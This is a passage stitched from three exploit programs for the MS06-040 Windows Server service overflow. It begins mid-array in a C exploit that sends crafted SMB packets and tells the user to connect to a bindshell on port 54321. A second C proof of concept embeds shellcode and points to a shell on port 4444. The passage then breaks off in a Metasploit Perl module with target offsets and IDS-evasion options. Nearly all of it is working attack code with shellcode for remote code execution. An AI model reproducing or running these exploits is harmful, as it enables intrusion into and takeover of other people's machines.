0x04, 0x08, 0x02, 0x00, 0x35, 0x79, 0x78, 0x32, 0x78, 0x70, 0x38, 0x35, 0x04, 0x08, 0x02, 0x00, 0x51, 0x67, 0x39, 0x36, 0x4a, 0x71, 0x65, 0x72, 0x56, 0x55, 0x47, 0x58, 0x53, 0x58, 0x59, 0x4f, 0x61, 0x61, 0x7a, 0x47, 0x62, 0x48, 0x56, 0x61, 0x73, 0x33, 0x4d, 0x4b, 0x34, 0x42, 0x39, 0x79, 0x00, 0x00, 0xbf, 0xf9, 0x78, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb4, 0xee, 0x7b, 0x00, 0x00, 0x00 }; char peer0_10[] = { 0x00, 0x00, 0x00, 0x66, 0xff, 0x53, 0x4d, 0x42, 0x25, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, 0x00, 0x08, 0x84, 0xec, 0x10, 0x00, 0x00, 0x1c, 0x00, 0x00, 0x04, 0xe0, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4a, 0x00, 0x1c, 0x00, 0x4a, 0x00, 0x02, 0x00, 0x26, 0x00, 0x00, 0x40, 0x23, 0x00, 0x5c, 0x50, 0x49, 0x50, 0x45, 0x5c, 0x00, 0x05, 0x00, 0x00, 0x02, 0x10, 0x00, 0x00, 0x00, 0x1c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1f, 0x00, 0x00, 0x00, 0x00, 0x00 }; char peer0_11[] = { 0x00, 0x00, 0x01, 0x57, 0xff, 0x53, 0x4d, 0x42, 0x2f, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, 0x00, 0x08, 0x84, 0xec, 0x0e, 0xff, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff, 0x08, 0x00, 0x18, 0x01, 0x00, 0x00, 0x18, 0x01, 0x3f, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x05, 0x00, 0x00, 0x01, 0x10, 0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x1f, 0x00, 0x1c, 0x67, 0xc4, 0x18, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0xbf, 0x34, 0x63, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x63, 0x01, 0x00, 0x00, 0x93, 0x48, 0x96, 0x48, 0xfc, 0x40, 0x93, 0x98, 0xf9, 0x98, 0x9f, 0x9f, 0x96, 0x37, 0x27, 0x90, 0x40, 0x9f, 0x4b, 0x4e, 0xd6, 0x93, 0x2b, 0xc9, 0x83, 0xe9, 0xaf, 0xd9, 0xee, 0xd9, 0x74, 0x24, 0xf4, 0x5b, 0x81, 0x73, 0x13, 0x2d, 0x2a, 0xd8, 0xe9, 0x83, 0xeb, 0xfc, 0xe2, 0xf4, 0xac, 0xee, 0x27, 0x06, 0xd2, 0xd5, 0x9c, 0x15, 0x47, 0xc1, 0x95, 0x01, 0xd4, 0xd5, 0x27, 0x16, 0x4d, 0xa1, 0xb4, 0xcd, 0x09, 0xa1, 0x9d, 0xd5, 0xa6, 0x56, 0xdd, 0x91, 0x2c, 0xc5, 0x53, 0xa6, 0x35, 0xa1, 0x87, 0xc9, 0x2c, 0xc1, 0x91, 0x62, 0x19, 0xa1, 0xd9, 0x07, 0x1c, 0xea, 0x41, 0x45, 0xa9, 0xea, 0xac, 0xee, 0xec, 0xe0, 0xd5, 0xe8, 0xef, 0xc1, 0x2c, 0xd2, 0x79, 0x0e, 0xf0, 0x9c, 0xc8, 0xa1, 0x87, 0xcd, 0x2c, 0xc1, 0xbe, 0x62, 0x21, 0x61, 0x53, 0xb6, 0x31, 0x2b, 0x33, 0xea, 0x01, 0xa1, 0x51, 0x85, 0x09, 0x36, 0xb9, 0x2a, 0x1c, 0xf1, 0xbc, 0x62, 0x6e, 0x1a, 0x53, 0xa9, 0x21, 0xa1, 0xa8, 0xf5, 0x80, 0xa1, 0x98, 0xe1, 0x73, 0x42, 0x56, 0xa7, 0x23, 0xc6, 0x88, 0x16, 0xfb, 0x4c, 0x8b, 0x8f, 0x45, 0x19, 0xea, 0x81, 0x5a, 0x59, 0xea, 0xb6, 0x79, 0xd5, 0x08, 0x81, 0xe6, 0xc7, 0x24, 0xd2, 0x7d, 0xd5, 0x0e, 0xb6, 0xa4, 0xcf, 0xbe, 0x68, 0xc0, 0x22, 0xda, 0xbc, 0x47, 0x28, 0x27, 0x39, 0x45, 0xf3, 0xd1, 0x1c, 0x80, 0x7d, 0x27, 0x3f, 0x7e, 0x79, 0x8b, 0xba, 0x7e, 0x69, 0x8b, 0xaa, 0x7e, 0xd5, 0x08, 0x8f, 0x45, 0xfe, 0xe9, 0x8f, 0x7e, 0xa3, 0x39, 0x7c, 0x45, 0x8e }; char peer0_12[] = { 0x00, 0x00, 0x01, 0x57, 0xff, 0x53, 0x4d, 0x42, 0x2f, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, 0x00, 0x08, 0x84, 0xec, 0x0e, 0xff, 0x00, 0x00, 0x00, 0x00, 0x40, 0x18, 0x01, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff, 0x08, 0x00, 0x18, 0x01, 0x00, 0x00, 0x18, 0x01, 0x3f, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x05, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x1f, 0x00, 0xc2, 0x99, 0xea, 0x7d, 0x27, 0x3f, 0x47, 0x3a, 0x89, 0xbc, 0xd2, 0xfa, 0xb0, 0x4d, 0x80, 0x04, 0x31, 0xbe, 0xd2, 0xfc, 0x8b, 0xbc, 0xd2, 0xfa, 0xb0, 0x0c, 0x64, 0xac, 0x91, 0xbe, 0xd2, 0xfc, 0x88, 0xbd, 0x79, 0x7f, 0x27, 0x39, 0xbe, 0x42, 0x3f, 0x90, 0xeb, 0x53, 0x8f, 0x16, 0xfb, 0x7f, 0x27, 0x39, 0x4b, 0x40, 0xbc, 0x8f, 0x45, 0x49, 0xb5, 0x60, 0xc8, 0x40, 0x88, 0xb0, 0x04, 0xe6, 0x51, 0x0e, 0x47, 0x6e, 0x51, 0x0b, 0x1c, 0xea, 0x2b, 0x43, 0xd3, 0x68, 0xf5, 0x17, 0x6f, 0x06, 0x4b, 0x64, 0x57, 0x12, 0x73, 0x42, 0x86, 0x42, 0xaa, 0x17, 0x9e, 0x3c, 0x27, 0x9c, 0x69, 0xd5, 0x0e, 0xb2, 0x7a, 0x78, 0x89, 0xb8, 0x7c, 0x40, 0xd9, 0xb8, 0x7c, 0x7f, 0x89, 0x16, 0xfd, 0x42, 0x75, 0x30, 0x28, 0xe4, 0x8b, 0x16, 0xfb, 0x40, 0x27, 0x16, 0x1a, 0xd5, 0x08, 0x62, 0x7a, 0xd6, 0x5b, 0x2d, 0x49, 0xd5, 0x0e, 0xbb, 0xd2, 0xfa, 0xb0, 0x06, 0xe3, 0xca, 0xb8, 0xba, 0xd2, 0xfc, 0x27, 0x39, 0x61, 0x72, 0x5a, 0x34, 0x54, 0x46, 0x4c, 0x45, 0x44, 0x38, 0x4f, 0x6a, 0x44, 0x33, 0x41, 0x49, 0x43, 0x49, 0x53, 0x52, 0x37, 0x41, 0x31, 0x34, 0x67, 0x66, 0x70, 0x41, 0x47, 0x41, 0x49, 0x34, 0x4d, 0x76, 0x75, 0x62, 0x31, 0x79, 0x57, 0x54, 0x64, 0x54, 0x5a, 0x6f, 0x45, 0x6e, 0x47, 0x71, 0x67, 0x52, 0x31, 0x66, 0x45, 0x5a, 0x6d, 0x41, 0x71, 0x39, 0x4c, 0x4c, 0x7a, 0x48, 0x6f, 0x50, 0x74, 0x4c, 0x47, 0x61, 0x6a, 0x30, 0x55, 0x69, 0x68, 0x7a, 0x7a, 0x6b, 0x69, 0x33, 0x4c, 0x70, 0x34, 0x47, 0x53, 0x4a, 0x54, 0x74, 0x39, 0x58, 0x33, 0x78, 0x43, 0x67, 0x54, 0x74, 0x58, 0x77, 0x32, 0x77, 0x42, 0x52, 0x4d, 0x57, 0x70, 0x36, 0x75, 0x38, 0x33, 0x52, 0x66, 0x79 }; char peer0_13[] = { 0x00, 0x00, 0x01, 0x57, 0xff, 0x53, 0x4d, 0x42, 0x2f, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, 0x00, 0x08, 0x84, 0xec, 0x0e, 0xff, 0x00, 0x00, 0x00, 0x00, 0x40, 0x30, 0x02, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff, 0x08, 0x00, 0x18, 0x01, 0x00, 0x00, 0x18, 0x01, 0x3f, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x05, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x1f, 0x00, 0x52, 0x36, 0x36, 0x37, 0x4e, 0x54, 0x6f, 0x48, 0x76, 0x51, 0x32, 0x63, 0x68, 0x67, 0x36, 0x68, 0x43, 0x39, 0x54, 0x46, 0x4b, 0x67, 0x79, 0x56, 0x57, 0x53, 0x45, 0x39, 0x42, 0x4a, 0x65, 0x4f, 0x57, 0x73, 0x42, 0x6b, 0x39, 0x52, 0x76, 0x31, 0x56, 0x42, 0x6e, 0x42, 0x70, 0x75, 0x42, 0x46, 0x58, 0x35, 0x48, 0x46, 0x62, 0x4a, 0x78, 0x6d, 0x33, 0x53, 0x50, 0x34, 0x30, 0x7a, 0x76, 0x46, 0x6c, 0x4f, 0x54, 0x37, 0x6a, 0x4a, 0x45, 0x59, 0x54, 0x6f, 0x69, 0x62, 0x36, 0x65, 0x57, 0x6a, 0x32, 0x44, 0x63, 0x31, 0x65, 0x4b, 0x36, 0x59, 0x55, 0x33, 0x32, 0x38, 0x78, 0x5a, 0x64, 0x42, 0x75, 0x56, 0x79, 0x52, 0x70, 0x36, 0x33, 0x47, 0x45, 0x7a, 0x31, 0x72, 0x36, 0x51, 0x50, 0x35, 0x70, 0x4f, 0x58, 0x59, 0x31, 0x75, 0x32, 0x39, 0x70, 0x74, 0x50, 0x41, 0x6a, 0x34, 0x65, 0x7a, 0x78, 0x69, 0x50, 0x59, 0x0a, 0x08, 0x02, 0x00, 0x4a, 0x52, 0x57, 0x6c, 0x39, 0x50, 0x77, 0x38, 0x04, 0x08, 0x02, 0x00, 0x32, 0x37, 0x49, 0x49, 0x56, 0x6d, 0x6f, 0x55, 0x68, 0x56, 0x69, 0x51, 0x41, 0x35, 0x43, 0x4c, 0x47, 0x6b, 0x4f, 0x45, 0x30, 0x51, 0x36, 0x52, 0x30, 0x6f, 0x64, 0x74, 0x78, 0x65, 0x32, 0x70, 0x04, 0x08, 0x02, 0x00, 0x35, 0x79, 0x78, 0x32, 0x78, 0x70, 0x38, 0x35, 0x04, 0x08, 0x02, 0x00, 0x51, 0x67, 0x39, 0x36, 0x4a, 0x71, 0x65, 0x72, 0x56, 0x55, 0x47, 0x58, 0x53, 0x58, 0x59, 0x4f, 0x61, 0x61, 0x7a, 0x47, 0x62, 0x48, 0x56, 0x61, 0x73, 0x33, 0x4d, 0x4b, 0x34, 0x42, 0x39, 0x79, 0x00, 0x00, 0xbf, 0xf9, 0x78, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb4, 0xee, 0x7b, 0x00, 0x00, 0x00 }; char peer0_14[] = { 0x00, 0x00, 0x00, 0x66, 0xff, 0x53, 0x4d, 0x42, 0x25, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, 0x00, 0x08, 0x84, 0xec, 0x10, 0x00, 0x00, 0x1c, 0x00, 0x00, 0x04, 0xe0, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4a, 0x00, 0x1c, 0x00, 0x4a, 0x00, 0x02, 0x00, 0x26, 0x00, 0x00, 0x40, 0x23, 0x00, 0x5c, 0x50, 0x49, 0x50, 0x45, 0x5c, 0x00, 0x05, 0x00, 0x00, 0x02, 0x10, 0x00, 0x00, 0x00, 0x1c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1f, 0x00, 0x00, 0x00, 0x00, 0x00 }; int main(int argc,char **argv) { int fd; int con; int repbf[20000]; struct sockaddr_in target; if(argc < 2) { printf("Microsoft Windows CanonicalizePathName() Remote Exploit (MS06-040)\n"); printf("Tested on WindowsXP SP1 EN and got a bindshell on port 54321\n"); printf("Win2k should give a crash in services.exe\n"); printf("I've used the default smbdomain: WORKGROUP\n\n"); printf("Usage: %s <ip>\n",argv[0]); printf("Example: %s 192.168.1.103\n\n",argv[0]); printf("Written by: Preddy\n"); printf("RootShell Security Group\n"); printf("www.team-rootshell.com\n"); exit(1); } fd = socket(AF_INET,SOCK_STREAM,0); if(fd < 0) { perror("Could not create socket\n"); exit(1); } printf("Target: %s\n",argv[1]); target.sin_family = AF_INET; target.sin_addr.s_addr = inet_addr(argv[1]); target.sin_port = htons(PORT); con = connect(fd,(struct sockaddr_in *)&target,sizeof(target)); if(con < 0) { printf("Could not connect\n"); exit(1); } sendto(fd,peer0_0,sizeof(peer0_0),0,&target,sizeof(target)); read(fd,repbf,sizeof(repbf)); sendto(fd,peer0_1,sizeof(peer0_1),0,&target,sizeof(target)); read(fd,repbf,sizeof(repbf)); sendto(fd,peer0_2,sizeof(peer0_2),0,&target,sizeof(target)); read(fd,repbf,sizeof(repbf)); sendto(fd,peer0_3,sizeof(peer0_3),0,&target,sizeof(target)); read(fd,repbf,sizeof(repbf)); sendto(fd,peer0_4,sizeof(peer0_4),0,&target,sizeof(target)); read(fd,repbf,sizeof(repbf)); sendto(fd,peer0_5,sizeof(peer0_5),0,&target,sizeof(target)); read(fd,repbf,sizeof(repbf)); sendto(fd,peer0_6,sizeof(peer0_6),0,&target,sizeof(target)); read(fd,repbf,sizeof(repbf)); sendto(fd,peer0_7,sizeof(peer0_7),0,&target,sizeof(target)); read(fd,repbf,sizeof(repbf)); sendto(fd,peer0_8,sizeof(peer0_8),0,&target,sizeof(target)); read(fd,repbf,sizeof(repbf)); sendto(fd,peer0_9,sizeof(peer0_9),0,&target,sizeof(target)); read(fd,repbf,sizeof(repbf)); sendto(fd,peer0_10,sizeof(peer0_10),0,&target,sizeof(target)); read(fd,repbf,sizeof(repbf)); sendto(fd,peer0_11,sizeof(peer0_11),0,&target,sizeof(target)); read(fd,repbf,sizeof(repbf)); sendto(fd,peer0_12,sizeof(peer0_12),0,&target,sizeof(target)); read(fd,repbf,sizeof(repbf)); sendto(fd,peer0_13,sizeof(peer0_13),0,&target,sizeof(target)); read(fd,repbf,sizeof(repbf)); sendto(fd,peer0_14,sizeof(peer0_14),0,&target,sizeof(target)); printf("Attack Finished: now open a new terminal and nc to your victim on port 54321\n"); printf("Warning: Don't close this window!\n"); read(fd,repbf,sizeof(repbf)); printf("Done..\n"); close(fd); } // milw0rm.com [2006-08-19]

/* * MS06-040 Remote Code Execution Proof of Concept * * Ported by ub3r st4r aka iRP * --------------------------------------------------------------------- * Tested Against: * Windows XP SP1 * Windows 2000 SP4 * * Systems Affected: * Microsoft Windows 2000 SP0-SP4 * Microsoft Windows XP SP0-SP1 * Microsoft Windows NT 4.0 * --------------------------------------------------------------------- * This is provided as proof-of-concept code only for educational * purposes and testing by authorized individuals with permission * to do so. * * PRIVATE v.0.2 (08-27-06) */ #include <stdio.h> #include <windows.h> #pragma comment(lib, "mpr") #pragma comment(lib, "Rpcrt4") // bind uuid interface: 4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0 unsigned char DCERPC_Bind_RPC_Service[] = "\x05\x00\x0B\x03\x10\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00" "\xD0\x16\xD0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00" "\xC8\x4F\x32\x4B\x70\x16\xD3\x01\x12\x78\x5A\x47\xBF\x6E\xE1\x88" "\x03\x00\x00\x00\x04\x5D\x88\x8A\xEB\x1C\xC9\x11\x9F\xE8\x08\x00" "\x2B\x10\x48\x60\x02\x00\x00\x00"; // request windows api: NetprPathCanonicalize (0x1f) unsigned char DCERPC_Request_RPC_Service[] = "\x05\x00\x00\x03\x10\x00\x00\x00\x30\x08\x00\x00\x00\x00\x00\x00" "\x18\x08\x00\x00\x00\x00\x1f\x00\xff\xff\xff\xff\x01\x00\x00\x00" "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"; // path ... unsigned char DCERPC_Request_RPC_Service_[] = "\xfa\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00" "\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00"; unsigned char sc[] = "\x6a\x51\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa8\x97\x90" "\x88\x83\xeb\xfc\xe2\xf4\x29\x53\x6f\x67\x57\x68\xd4\x74\xc2\x7c" "\xdd\x60\x51\x68\x6f\x77\xc8\x1c\xfc\xac\x8c\x1c\xd5\xb4\x23\xeb" "\x95\xf0\xa9\x78\x1b\xc7\xb0\x1c\xcf\xa8\xa9\x7c\xd9\x03\x9c\x1c" "\x91\x66\x99\x57\x09\x24\x2c\x57\xe4\x8f\x69\x5d\x9d\x89\x6a\x7c" "\x64\xb3\xfc\xb3\xb8\xfd\x4d\x1c\xcf\xac\xa9\x7c\xf6\x03\xa4\xdc" "\x1b\xd7\xb4\x96\x7b\x8b\x84\x1c\x19\xe4\x8c\x8b\xf1\x4b\x99\x4c" "\xf4\x03\xeb\xa7\x1b\xc8\xa4\x1c\xe0\x94\x05\x1c\xd0\x80\xf6\xff" "\x1e\xc6\xa6\x7b\xc0\x77\x7e\xf1\xc3\xee\xc0\xa4\xa2\xe0\xdf\xe4" "\xa2\xd7\xfc\x68\x40\xe0\x63\x7a\x6c\xb3\xf8\x68\x46\xd7\x21\x72" "\xf6\x09\x45\x9f\x92\xdd\xc2\x95\x6f\x58\xc0\x4e\x99\x7d\x05\xc0" "\x6f\x5e\xfb\xc4\xc3\xdb\xfb\xd4\xc3\xcb\xfb\x68\x40\xee\xc0\x86" "\xcc\xee\xfb\x1e\x71\x1d\xc0\x33\x8a\xf8\x6f\xc0\x6f\x5e\xc2\x87" "\xc1\xdd\x57\x47\xf8\x2c\x05\xb9\x79\xdf\x57\x41\xc3\xdd\x57\x47" "\xf8\x6d\xe1\x11\xd9\xdf\x57\x41\xc0\xdc\xfc\xc2\x6f\x58\x3b\xff" "\x77\xf1\x6e\xee\xc7\x77\x7e\xc2\x6f\x58\xce\xfd\xf4\xee\xc0\xf4" "\xfd\x01\x4d\xfd\xc0\xd1\x81\x5b\x19\x6f\xc2\xd3\x19\x6a\x99\x57" "\x63\x22\x56\xd5\xbd\x76\xea\xbb\x03\x05\xd2\xaf\x3b\x23\x03\xff" "\xe2\x76\x1b\x81\x6f\xfd\xec\x68\x46\xd3\xff\xc5\xc1\xd9\xf9\xfd" "\x91\xd9\xf9\xc2\xc1\x77\x78\xff\x3d\x51\xad\x59\xc3\x77\x7e\xfd" "\x6f\x77\x9f\x68\x40\x03\xff\x6b\x13\x4c\xcc\x68\x46\xda\x57\x47" "\xf8\x67\x66\x77\xf0\xdb\x57\x41\x6f\x58"; int main(int argc, char* argv[]) { HANDLE hFile; NETRESOURCE nr; char szRemoteName[MAX_PATH], szPipePath[MAX_PATH]; unsigned int i; unsigned char szInBuf[4096]; unsigned long dwRead, nWritten; unsigned char szReqBuf[2096]; if (argc < 3){ printf("[-] Usage: ms06040poc <host> [target]\n"); printf("\t1 - Windows 2000 SP0-SP4\n"); printf("\t2 - Windows XP SP0-SP1\n"); return -1; } memset(szReqBuf, 0, sizeof(szReqBuf)); if (atoi(argv[2]) == 1) { unsigned char szBuff[1064]; // build payload buffer memset(szBuff, '\x90', 1000); memcpy(szBuff+630, sc, sizeof(sc)); for(i=1000; i<1064; i+=4) { memcpy(szBuff+i, "\x04\x08\x02\x00", 4); } // build request buffer memcpy(szReqBuf, DCERPC_Request_RPC_Service, sizeof(DCERPC_Request_RPC_Service)-1); memcpy(szReqBuf+44, "\x15\x02\x00\x00", 4); /* max count */ memcpy(szReqBuf+48, "\x00\x00\x00\x00", 4); /* offset */ memcpy(szReqBuf+52, "\x15\x02\x00\x00", 4); /* actual count */ memcpy(szReqBuf+56, szBuff, sizeof(szBuff)); memcpy(szReqBuf+1120, "\x00\x00\x00\x00", 4); /* align string */ memcpy(szReqBuf+1124, DCERPC_Request_RPC_Service_, sizeof(DCERPC_Request_RPC_Service_)-1); memcpy(szReqBuf+1140 , "\xeb\x02", 2); } if (atoi(argv[2]) == 2) { unsigned char szBuff[708]; memset(szBuff, '\x90', 612); /* size of shellcode */ memcpy(szBuff, sc, sizeof(sc)); memcpy(szBuff+612, "\x0a\x08\x02\x00", 4); memset(szBuff+616, 'A', 8); // 8 bytes padding memcpy(szBuff+624, "\x04\x08\x02\x00", 4); memset(szBuff+628, '\x90', 32); memcpy(szBuff+660, "\x04\x08\x02\x00", 4); memset(szBuff+664, 'B', 8); // 8 bytes padding memcpy(szBuff+672, "\x04\x08\x02\x00", 4); memset(szBuff+676, '\x90', 32); // build request buffer memcpy(szReqBuf, DCERPC_Request_RPC_Service, sizeof(DCERPC_Request_RPC_Service)-1); memcpy(szReqBuf+44, "\x63\x01\x00\x00", 4); /* max count */ memcpy(szReqBuf+48, "\x00\x00\x00\x00", 4); /* offset */ memcpy(szReqBuf+52, "\x63\x01\x00\x00", 4); /* actual count */ memcpy(szReqBuf+56, szBuff, sizeof(szBuff)); memcpy(szReqBuf+764, "\x00\x00\x00\x00", 4); /* align string */ memcpy(szReqBuf+768, DCERPC_Request_RPC_Service_, sizeof(DCERPC_Request_RPC_Service_)-1); } printf("[+] Connecting to %s ... \n", argv[1]); _snprintf(szRemoteName, sizeof(szRemoteName), "\\\\%s\\ipc$", argv[1]); nr.dwType = RESOURCETYPE_ANY; nr.lpLocalName = NULL; nr.lpProvider = NULL; nr.lpRemoteName = szRemoteName; if (WNetAddConnection2(&nr, "", "", 0) != NO_ERROR) { printf("[-] Failed to connect to host !\n"); return -1; } _snprintf(szPipePath, sizeof(szPipePath), "\\\\%s\\pipe\\browser", argv[1]); hFile = CreateFile(szPipePath, GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL); if (hFile == INVALID_HANDLE_VALUE) { printf("[-] Failed to open named pipe !\n"); return -1; } printf("[+] Binding to RPC interface ... \n"); if (TransactNamedPipe(hFile, DCERPC_Bind_RPC_Service, sizeof(DCERPC_Bind_RPC_Service), szInBuf, sizeof(szInBuf), &dwRead, NULL) == 0) { printf("[-] Failed to bind to interface !\n"); CloseHandle(hFile); return -1; } printf("[+] Sending RPC request ... \n"); if (!WriteFile(hFile, szReqBuf, sizeof(szReqBuf), &nWritten, 0)) { printf("[-] Unable to transmit RPC request !\n"); CloseHandle(hFile); return -1; } printf("[+] Now check for shell on %s:4444 !\n", argv[1]); return 0; } // milw0rm.com [2006-08-28]

## # This file is part of the Metasploit Framework and may be redistributed # according to the licenses defined in the Authors field below. In the # case of an unknown or missing license, this file defaults to the same # license as the core Framework (dual GPLv2 and Artistic). The latest # version of the Framework can always be obtained from metasploit.com. ## package Msf::Exploit::netapi_ms06_040; use base "Msf::Exploit"; use strict; use Pex::DCERPC; use Pex::NDR; my $advanced = { 'FragSize' => [ 256, 'The DCERPC fragment size' ], 'BindEvasion' => [ 0, 'IDS Evasion of the bind request' ], 'DirectSMB' => [ 0, 'Use direct SMB (445/tcp)' ], }; my $info = { 'Name' => 'Microsoft NetpIsRemote() MSO6-040 Overflow', 'Version' => '$Revision: 3715 $', 'Authors' => [ 'H D Moore <hdm [at] metasploit.com>', ], 'Arch' => ['x86'], 'OS' => [ 'win32', 'win2000', 'winxp', 'win2003' ], 'Priv' => 1, 'AutoOpts' => { 'EXITFUNC' => 'thread' }, 'UserOpts' => { 'RHOST' => [ 1, 'ADDR', 'The target address' ], # SMB connection options 'SMBUSER' => [ 0, 'DATA', 'The SMB username to connect with', '' ], 'SMBPASS' => [ 0, 'DATA', 'The password for specified SMB username', '' ], 'SMBDOM' => [ 0, 'DATA', 'The domain for specified SMB username', '' ], }, 'Payload' => { # Technically we can use more space than this, but by limiting it # to 370 bytes we can use the same request for all Windows SPs. 'Space' => 370, 'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e", 'Keys' => ['+ws2ord'], # sub esp, 4097 + inc esp makes stack happy 'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44", }, 'Description' => Pex::Text::Freeform( qq{ This module exploits a stack overflow in the NetApi32 NetpIsRemote() function using the NetpwPathCanonicalize RPC call in the Server Service. It is likely that other RPC calls could be used to exploit this service. This exploit will result in a denial of service on on Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt will likely result in a complete reboot on Windows 2000 and the termination of all SMB-related services on Windows XP. The default target for this exploit should succeed on Windows NT 4.0, Windows 2000 SP0-SP4+, and Windows XP SP0-SP1. } ), 'Refs' => [ [ 'BID', '19409' ], [ 'CVE', '2006-3439' ], [ 'MSB', 'MS06-040' ], ], 'DefaultTarget' => 0, 'Targets' => [ [ '(wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)' ], [ '(wcscpy) Windows NT 4.0 / Windows 2000 SP0-SP4', 1000, 0x00020804 ], [ '(wcscpy) Windows XP SP0/SP1', 612, 0x00020804 ], [ '(stack) Windows XP SP1 English', 656, 680, 0x71ab1d54], # jmp esp @ ws2_32.dll ], 'Keys' => ['srvsvc'], 'DisclosureDate' => 'Aug 08 2006', }; sub new { my ($class) = @_; my $self = $class->SUPER::new( { 'Info' => $info, 'Advanced' => $advanced }, @_ ); return ($self); } sub Exploit { my ($self) = @_; my $target_host = $self->GetVar('RHOST'); my $target_port = $self->GetVar('RPORT'); my $target_idx = $self->GetVar('TARGET'); my $shellcode = $self->GetVar('EncodedPayload')->Payload; my $target_name = '*SMBSERVER'; my $FragSize = $self->GetVar('FragSize') || 256; my $target = $self->Targets->[$target_idx]; if (!$self->InitNops(128)) { $self->PrintLine("Could not initialize the nop module"); return; } my ( $res, $rpc ); my $pipe = '\BROWSER'; my $uuid = '4b324fc8-1670-01d3-1278-5a47bf6ee188'; my $version = '3.0'; my $handle = Pex::DCERPC::build_handle( $uuid, $version, 'ncacn_np', $target_host, $pipe ); my $dce = Pex::DCERPC->new( 'handle' => $handle, 'username' => $self->GetVar('SMBUSER'), 'password' => $self->GetVar('SMBPASS'), 'domain' => $self->GetVar('SMBDOM'), 'fragsize' => $self->GetVar('FragSize'), 'bindevasion' => $self->GetVar('BindEvasion'), 'directsmb' => $self->GetVar('DirectSMB'), ); if ( !$dce ) { $self->PrintLine("[*] Could not bind to $handle"); return; } my $smb = $dce->{'_handles'}{$handle}{'connection'}; if (! $smb) { $self->PrintLine("[*] Could not establish SMB session"); return; } if ( $target->[0] =~ /Automatic/ ) { if ( $smb->PeerNativeOS eq 'Windows 5.0' ) { $target = $self->Targets->[1]; $self->PrintLine('[*] Detected a Windows 2000 target'); } elsif ( $smb->PeerNativeOS eq 'Windows 5.1' ) { $target = $self->Targets->[2]; $self->PrintLine('[*] Detected a Windows XP target'); $self->PrintLine('[*] This will not work on SP2!'); } elsif ( $smb->PeerNativeOS eq 'Windows 4.0' ) { $target = $self->Targets->[1]; $self->PrintLine('[*] Detected a Windows NT 4.0 target'); $self->PrintLine('[*] Please email us with the results!'); } else { $self->PrintLine('[*] No target available for ' . $smb->PeerNativeOS() ); return; } } # # /* Function 0x1f at 0x767e912c */ # long function_1f ( # [in] [unique] [string] wchar_t * arg_00, # [in] [string] wchar_t * arg_01, # [out] [size_is(arg_03)] char * arg_02, # [in] [range(0, 64000)] long arg_03, # [in] [string] wchar_t * arg_04, # [in,out] long * arg_05, # [in] long arg_06 # ); # my $stub; # # Use the wcscpy() method on NT 4.0 / 2000 # if ($target->[0] =~ /2000/ && ! $target->[3]) { # Pad 